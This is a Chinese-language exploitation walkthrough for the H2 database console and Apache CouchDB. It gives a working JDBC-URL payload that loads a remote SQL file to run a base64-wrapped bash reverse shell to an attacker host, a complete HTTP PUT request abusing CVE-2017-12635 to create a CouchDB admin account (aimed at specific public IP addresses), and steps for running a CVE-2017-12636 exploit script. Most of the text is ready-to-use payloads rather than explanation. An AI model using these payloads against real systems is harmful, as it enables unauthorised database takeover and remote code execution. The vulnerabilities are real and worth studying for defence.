#数据库应用-H2database- -未授权访问&CVE漏洞
默认端口:20051
Java SQL 数据库 H2,H2的主要特点是:非常快,开源,JDBC API;嵌入式和服务器模式;内存数据库;基于浏览器的控制台应用程序。H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在v2.1.210+中修复。2.1.210 之前的H2控制台允许远程攻击者通过包含子字符串的jdbc:h2:mem JDBC URL执行任意代码。
数据库识别:
复现:
1、生成远程调用链接
链接填进去:
上面写:javax.naming.InitialContext
但是这边没有反应:
2、未授权进入:
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\
进去了
3、RCE执行反弹:
在攻击机上:
1.创建数据库文件:fuckh2db.sql
文件内容:
CREATE TABLE test (
id INT NOT NULL
);
CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';
#反弹shell指令示例:bash -i >& /dev/tcp/x.x.x.x/6666 0>&1
x.x.x.x换成自己攻击机(接收shell的服务器)IP
base64加密的反弹shell指令:
2.启动提供SQL文件远程加载服务
python3 -m http.server 端口
自己电脑访问sql文件
默认下载
攻击机上显示资源别访问过:
-填入Payload使其加载远程SQL
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://搭建的IP:端口/h2database.sql';\
写到下面的框里面:
![](https://img-blog.csdnimg.cn/2c9fe858355846389dcc71ba4aa78d54.jpeg)
![](https://img-blog.csdnimg.cn/542d453e11ab41399ccf6067d00b1332.jpeg)
#数据库应用-Couchdb-未授权越权&CVE漏洞
默认端口:5984
-Couchdb 垂直权限绕过(CVE-2017-12635)
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露利用。
用PUT请求:
1、先创建用户(bp发包)
PUT /_users/org.couchdb.user:xtang HTTP/1.1
Host: 47.94.236.117:44389
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
"type": "user",
"name": "xtang",
"roles": ["_admin"],
"roles": [],
"password": "xtang"
}
2、登录用户授权
Get:http://39.101.70.82:5984/_utils/
xtang xtang
复现:
我这里使用postman发包,发送put数据包:
访问:http://39.101.70.82:5984/_utils/
输入账号密码:xtang xtang
成功登录
-Couchdb 命令执行 (CVE-2017-12636)
1、下载exp.py
2、修改目标和反弹地址
3、Python3调用执行即可
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py
代码改两个地方:
这里我用的同一个机子
监听到了: